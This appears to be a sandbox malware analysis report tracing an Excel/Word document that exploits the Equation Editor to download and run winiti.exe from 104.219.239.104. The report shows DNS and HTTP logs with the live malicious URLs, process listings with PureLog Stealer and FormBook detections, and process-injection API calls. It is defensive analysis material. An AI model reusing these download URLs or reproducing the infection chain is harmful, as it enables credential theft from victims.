                        Jul 26, 2024 13:40:22.408610106 CEST | 192.168.2.22 | 8.8.8.8 | 0x7ef5 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:26.216869116 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:26.237873077 CEST | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | tny.wtf | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Jul 26, 2024 13:40:18.532171965 CEST | 8.8.8.8 | 192.168.2.22 | 0x5750 | No error (0) | tny.wtf | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:18.532171965 CEST | 8.8.8.8 | 192.168.2.22 | 0x5750 | No error (0) | tny.wtf | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:20.676371098 CEST | 8.8.8.8 | 192.168.2.22 | 0x24b1 | No error (0) | tny.wtf | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:20.676371098 CEST | 8.8.8.8 | 192.168.2.22 | 0x24b1 | No error (0) | tny.wtf | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:22.407102108 CEST | 8.8.8.8 | 192.168.2.22 | 0x7764 | No error (0) | tny.wtf | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:22.407102108 CEST | 8.8.8.8 | 192.168.2.22 | 0x7764 | No error (0) | tny.wtf | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:22.415918112 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ef5 | No error (0) | tny.wtf | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:22.415918112 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ef5 | No error (0) | tny.wtf | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:26.236521959 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | tny.wtf | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:26.236521959 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | tny.wtf | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:26.246084929 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | tny.wtf | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                        Jul 26, 2024 13:40:26.246084929 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | tny.wtf | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                        • tny.wtf
                        • 104.219.239.104
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.22 | 49161 | 188.114.97.3 | 80 | 1892 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Timestamp | Bytes transferred | Direction | Data
                        Jul 26, 2024 13:40:18.547000885 CEST | 317 | OUT | GET /dGa HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: tny.wtf
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:19.673207998 CEST | 727 | IN | HTTP/1.1 302 Found
                        Date: Fri, 26 Jul 2024 11:40:19 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Location: http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fp7O6aGpmcyE4iP%2FKFZIvwnI%2F4G2s%2FaEiLzgN0U2yJJe8Y5fyxRQs%2FyDmi1gyjZOT1q%2BCg0Kd4MeYlIuOpOwVnLcGi1Uirrr1mrYBtOe%2F3tz7WfQljcP5J%2BI"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d3a8ebdc40c-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.22 | 49162 | 104.219.239.104 | 80 | 1892 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Timestamp | Bytes transferred | Direction | Data
                        Jul 26, 2024 13:40:19.699269056 CEST | 448 | OUT | GET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 104.219.239.104
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:20.214741945 CEST | 1236 | IN | HTTP/1.1 200 OK
                        Date: Fri, 26 Jul 2024 11:40:20 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        Last-Modified: Fri, 26 Jul 2024 01:46:43 GMT
                        ETag: "14857-61e1caef74ae3"
                        Accept-Ranges: bytes
                        Content-Length: 84055
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/msword
                        Jul 26, 2024 13:40:20.222795963 CEST1236INData Raw: 0d 0a 0a 0d 0a 0d 0a 0a 0d 37 35 36 0d 0a 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 31 35 34 09 09 20 20 20 20 09 20 09 20 20 09 09 20 09 20 09 09 09 20 09 20 20 09 20 09 09 20 09 09 20 20 20 20 20 20 09 20 09 20 09 09 20 09 09 09
                        Data Ascii: 756154 49 6f4e2e33
                        Jul 26, 2024 13:40:20.222826958 CEST1236INData Raw: 20 09 20 20 20 20 09 09 20 09 09 20 09 09 09 09 20 20 09 09 20 20 20 09 09 20 20 09 38 34 37 0a 0a 0d 0d 0d 0a 0a 0a 0a 0d 0d 0d 0a 0d 0a 0a 0a 0a 0a 0d 0d 30 66 0a 0d 0a 0d 0a 0d 0d 0d 0d 0d 0d 0d 0a 0d 0a 0a 0a 0a 0a 0d 0d 33 38 31 63 0d 0d 0a
                        Data Ascii: 8470f381c5 f 638d
                        Jul 26, 2024 13:40:20.227536917 CEST1236INData Raw: 63 0a 0d 0d 0d 0d 0d 0a 0a 0d 0d 0d 0d 0a 0d 0d 0a 0d 0a 0d 0d 0d 36 0d 0a 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 0a 0a 0a 0a 0a 0d 31 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0a 0a 0a 0d 0a 0a 0a 0a 0a 0a 0d 37 37 09 09 20 09 20 20 20 20 09 09 09 09 09 20
                        Data Ascii: c6177 2ffe09 0e
                        Jul 26, 2024 13:40:20.227555990 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 09 20 20 20 20 20 09 09 09 09 09 09 09 20 20 09 09 31 30 0a 0d 0d 0a 0a 0d 0d 0a 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 62 0d 0d 0a 0a 0a 0a 0a 0a 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 66 0a 0d 0d 0a 0a 0a 0d 0d 0d 0d
                        Data Ascii: 10bfd1c2 2174
                        Jul 26, 2024 13:40:20.232242107 CEST1236INData Raw: 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0a 0a 0d 0d 37 32 20 09 09 20 20 20 20 09 20 09 20 20 20 20 20 20 20 20 09 20 20 20 20 09 09 20 20 20 20 09 09 09 20 20 20 09 20 09 09 09 09 20 09 20 20 20 20 09 09 20 20 20 20 20 20 20 09 09 20 20 09 20 20 09 09 20
                        Data Ascii: 72 c 0 687
                        Jul 26, 2024 13:40:20.232275963 CEST1236INData Raw: 09 09 20 20 09 09 20 09 09 20 09 09 20 20 20 09 09 09 20 20 09 20 20 09 20 20 09 09 09 32 38 61 0a 0a 0a 0a 0d 0d 0d 0a 0a 0d 0a 0a 0d 0d 0d 0a 0d 0d 0d 0d 0d 31 35 36 09 09 09 09 20 20 09 09 20 09 09 20 09 20 20 20 20 20 09 09 09 20 20 09 20 20
                        Data Ascii: 28a156 e 95e78bf


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.22 | 49163 | 188.114.97.3 | 80 | 1012 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        Timestamp | Bytes transferred | Direction | Data
                        Jul 26, 2024 13:40:20.686238050 CEST | 129 | OUT | OPTIONS / HTTP/1.1
                        User-Agent: Microsoft Office Protocol Discovery
                        Host: tny.wtf
                        Content-Length: 0
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:21.234082937 CEST | 562 | IN | HTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:21 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUDIJoRUGvNJ0PNTuX7ZUsOG4uZhD8nTjir3U26jCZtfdcUpt6EmhafoL32hISzG0PbtgJUL0prVl%2Fji9sHwKu5fBApgukv%2Br9j%2Fzuq4ZC0URzfg%2BiMWXLxb"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d47ceed5e79-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0
                        Jul 26, 2024 13:40:21.686033010 CEST | 129 | OUT | OPTIONS / HTTP/1.1
                        User-Agent: Microsoft Office Protocol Discovery
                        Host: tny.wtf
                        Content-Length: 0
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:21.830341101 CEST | 560 | IN | HTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:21 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=plG0JCxoAKlGuo26MmlKyEXJVvVj%2Bf8tpWJBrWUSZ3eXFfejgYUVbeskNpEmJSH%2BakRDz19hd20DkL%2FpH1JaNAwp5VGCQQPRxFCVOvviqJ2ml9WAn2waQIV3"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d4bd98e5e79-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0
                        Jul 26, 2024 13:40:21.839262009 CEST | 129 | OUT | OPTIONS / HTTP/1.1
                        User-Agent: Microsoft Office Protocol Discovery
                        Host: tny.wtf
                        Content-Length: 0
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:21.984366894 CEST | 564 | IN | HTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:21 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4C56WPN0iN%2BgthEsRjYJrauRNBV%2Fd69qyhca%2BS7uZjfxTCL8Vo3zKLLqIuYan2fHzuwtUXcrHOw9DLlQOPcmMGD%2BkuYSBo2Vv%2Fzf2FhSQMa3CYQyt1MXo6V2"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d4cca2b5e79-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0
                        Jul 26, 2024 13:40:26.929503918 CEST | 130 | OUT | HEAD /dGa HTTP/1.1
                        User-Agent: Microsoft Office Existence Discovery
                        Host: tny.wtf
                        Content-Length: 0
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:27.074498892 CEST | 546 | IN | HTTP/1.1 405 Method Not Allowed
                        Date: Fri, 26 Jul 2024 11:40:27 GMT
                        Connection: keep-alive
                        Allow: GET
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEjlQM1F9ImZiq8j7xA95p2q2ih0%2BVtNAk4zH2SW5kxe%2FbNi4uggTZreIY0wdKVOCHG1MUQcEHZ6S9X519T5i8qFEo1YdAegh9Vg98AB1Sjt0ojVRpptG03P"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d6c9ac65e79-EWR
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.22 | 49164 | 188.114.96.3 | 80 | 1012 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        Timestamp | Bytes transferred | Direction | Data
                        Jul 26, 2024 13:40:22.421689987 CEST | 111 | OUT | HEAD /dGa HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Microsoft Office Existence Discovery
                        Host: tny.wtf
                        Jul 26, 2024 13:40:23.001195908 CEST | 556 | IN | HTTP/1.1 405 Method Not Allowed
                        Date: Fri, 26 Jul 2024 11:40:22 GMT
                        Connection: keep-alive
                        Allow: GET
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ikjItfhHyvj6dW0nsuVBnYXWooGEWIslrDITK4RVBT3%2BvTI6fFxh7n6HmJVKsVDHAbQYo2f%2BcZiyPxe3hS66Dxs%2BUhcaL%2FHPFlxfs5dL%2Fd%2F%2BKKPgfUi4ysE"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d52cbee42de-EWR
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                        4 | 192.168.2.22 | 49165 | 188.114.96.3 | 80
                        Timestamp | Bytes transferred | Direction | Data
                        Jul 26, 2024 13:40:26.251523972 CEST | 124 | OUT | OPTIONS / HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                        translate: f
                        Host: tny.wtf
                        Jul 26, 2024 13:40:26.834196091 CEST | 564 | IN | HTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:26 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DK4%2FPYBA3If48iGooDP%2FeqPPqpoWJk9HuUhYKOLu4FxKJSb9kjv1sVS5SkTDG5iGgEFUGpvLyB0MYLuJxNFIpYgJowS%2FFE2o9HXFcYNFfo9Nom4%2BMylFrR%2B"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d6abcb67ca2-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0
                        Jul 26, 2024 13:40:27.044694901 CEST | 564 | IN | HTTP/1.1 404 Not Found
                        Date: Fri, 26 Jul 2024 11:40:26 GMT
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        X-Powered-By: ASP.NET
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DK4%2FPYBA3If48iGooDP%2FeqPPqpoWJk9HuUhYKOLu4FxKJSb9kjv1sVS5SkTDG5iGgEFUGpvLyB0MYLuJxNFIpYgJowS%2FFE2o9HXFcYNFfo9Nom4%2BMylFrR%2B"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8a941d6abcb67ca2-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.22 | 49166 | 104.219.239.104 | 80 | 1256 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Timestamp | Bytes transferred | Direction | Data
                        Jul 26, 2024 13:40:27.540389061 CEST | 315 | OUT | GET /80/winiti.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 104.219.239.104
                        Connection: Keep-Alive
                        Jul 26, 2024 13:40:28.012634039 CEST | 1236 | IN | HTTP/1.1 200 OK
                        Date: Fri, 26 Jul 2024 11:40:27 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                        Last-Modified: Tue, 16 Jul 2024 19:13:36 GMT
                        ETag: "e8400-61d6224798859"
                        Accept-Ranges: bytes
                        Content-Length: 951296
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdownload



                        Target ID:0
                        Start time:07:39:58
                        Start date:26/07/2024
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Imagebase:0x13f0c0000
                        File size:28'253'536 bytes
                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:3
                        Start time:07:40:19
                        Start date:26/07/2024
                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                        Imagebase:0x13f6c0000
                        File size:1'423'704 bytes
                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:07:40:26
                        Start date:26/07/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:07:40:28
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Roaming\winiti.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                        Imagebase:0x1380000
                        File size:951'296 bytes
                        MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.414747610.0000000000590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.415607695.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        Target ID:9
                        Start time:07:40:29
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Roaming\winiti.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                        Imagebase:0x1380000
                        File size:951'296 bytes
                        MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true


                        Module: Sheet1

                        Declaration
                        Attribute VB_Name = "Sheet1"
                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True

                        Module: Sheet2

                        Declaration
                        Attribute VB_Name = "Sheet2"
                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True

                        Module: Sheet3

                        Declaration
                        Attribute VB_Name = "Sheet3"
                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True

                        Module: ThisWorkbook

                        Declaration
                        Attribute VB_Name = "ThisWorkbook"
                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True


                          Execution Graph

                          Execution Coverage:18.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:138
                          Total number of Limit Nodes:2
                          Execution graph (image not reproduced); API calls labelled on its nodes: CreateProcessA, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory, Wow64SetThreadContext, ResumeThread

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$TJp$Tep$pp$sk?$xbp
                          • API String ID: 0-448541618
                          • Opcode ID: 3d5286a96d690567781f172c3761532fe16a6b9b01357dc1e8ed21bdbc8917a5
                          • Instruction ID: 25338b93bf8acd53bf598758f7d235579d4da83637d4052122b940227aeb7041
                          • Opcode Fuzzy Hash: 3d5286a96d690567781f172c3761532fe16a6b9b01357dc1e8ed21bdbc8917a5
                          • Instruction Fuzzy Hash: 8C624775A10614DFDB14DFA8C894F59BBB2FF89304F1682A8E509AB266CB31ED51CF40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: Ppp
                          • API String ID: 0-99483665
                          • Opcode ID: 173eda1ebd07080c7cbc0e061f20edafa37ea84f86fde2431c5e0a5c450dc42c
                          • Instruction ID: 37444c3e5ea57e52e4f6fda67891a2319fd8466fc58ad046b9db05bcec92d04d
                          • Opcode Fuzzy Hash: 173eda1ebd07080c7cbc0e061f20edafa37ea84f86fde2431c5e0a5c450dc42c
                          • Instruction Fuzzy Hash: 9403B434A5121ACFCB64DB64C894BE9B7B2FF89304F5146E9E4096B361DB31AE85CF40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: Ppp
                          • API String ID: 0-99483665
                          • Opcode ID: 179813d8763974584020b087c3cc8f9181e9d9dfa43d991c5715204b6f0e6c75
                          • Instruction ID: 1ce69628e431685dec018c669ebaeed841ac0d1c272151a31ef49da35a242f9b
                          • Opcode Fuzzy Hash: 179813d8763974584020b087c3cc8f9181e9d9dfa43d991c5715204b6f0e6c75
                          • Instruction Fuzzy Hash: 85F2B534A5121ACFCB64DB64C894BE9B7B1FF8A304F5146E9E4096B361DB31AE85CF40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: $p$$p$$p$$p
                          • API String ID: 0-3121760203
                          • Opcode ID: 62568d65a2ffd36646869d1199952c8ab06eafc59f47052f8541752f17404d5b
                          • Instruction ID: 37c7ec4378e77757afce3a8a019b15b6d266fe3a7ea3dc12764284f3a0cf2b85
                          • Opcode Fuzzy Hash: 62568d65a2ffd36646869d1199952c8ab06eafc59f47052f8541752f17404d5b
                          • Instruction Fuzzy Hash: 47415F34B002008FD718AB74DC59B6E7BE2EFC8301F2880A9E506D73A9DE759D51CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: Tep$Tep
                          • API String ID: 0-347264811
                          • Opcode ID: 925d90c0ccec22add6190ac2c5d2414ea607779f72a1a838df0a36eb3fd0b5a3
                          • Instruction ID: 4a5f7c58e08b0d364034c66b3a65bbda6d1a17a2e3463207de062b4657adc172
                          • Opcode Fuzzy Hash: 925d90c0ccec22add6190ac2c5d2414ea607779f72a1a838df0a36eb3fd0b5a3
                          • Instruction Fuzzy Hash: CF61D374E14208CFDB08CFA9C884AEDFBB6BF89300F20912AD41AAB355D7745955CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: Tep$Tep
                          • API String ID: 0-347264811
                          • Opcode ID: f408e034621084e1d384c1fe8dd5843ff7918c1be365ff92365c137dc49dcfff
                          • Instruction ID: 14fb3492ca18b940e39214d12c252a306b7038568c1098828f5228f283b28b31
                          • Opcode Fuzzy Hash: f408e034621084e1d384c1fe8dd5843ff7918c1be365ff92365c137dc49dcfff
                          • Instruction Fuzzy Hash: FE41C030B111049FD715ABA8D96976F7AA7EBC8300F20406CE50AAB389CF789C068B91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BD3DAF
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
